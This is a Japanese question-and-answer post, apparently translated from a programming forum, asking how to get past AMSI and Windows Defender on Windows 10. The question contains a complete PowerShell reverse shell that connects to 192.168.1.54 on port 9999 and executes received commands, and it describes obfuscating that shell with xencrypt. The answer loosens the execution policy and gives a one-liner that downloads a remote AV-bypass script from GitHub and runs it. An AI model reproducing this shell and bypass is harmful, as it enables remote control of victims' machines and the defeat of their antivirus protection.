AMSI Windows 10をバイパスする
私はWindows 10でpowershellリバースシェルを実行しようとしています。とにかく、それはWndows Defenderによってブロックされます。どうすればバイパスできますか?
ペイロードをファイルに保存します
$client = New-Object System.Net.Sockets.TCPClient('192.168.1.54',9999);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{;
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close();
次に xencrypt を使用してコードを難読化しますが、powershell -NoP -NonI -W Hidden -Exec Bypass .\revshell.ps1を実行すると
私は得る
Questo script include contenuto dannoso ed è stato bloccato dal software antivirus.
In riga:18 car:1
+ IEX($piifnga)
+ ~~~~~~~~~~~~~
+ CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
質問:このチェックをバイパスする方法はありますか?
- powerShellを開く
- _
Get-ExecutionPolicy -List_で実行ポリシーをリストする LocalMachineがRestrictedであり、管理者でない場合...- ..._
Set-ExecutionPolicy -Scope Process Unrestricted_を使用してローカルでポリシーを変更できます。これにより、マシンに保存されている_.ps_スクリプトを実行できます... - とにかく、悪意のあるコンテンツを実行することはできません。だからAMSIをバイパスする
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/aloksaurabh/OffenPowerSh/master/Bypass/Invoke-AlokS-AvBypass.ps1'); Invoke-AlokS-AvBypass
ScriptContainedMaliciousContentメッセージを実行するスクリプトは表示されなくなりました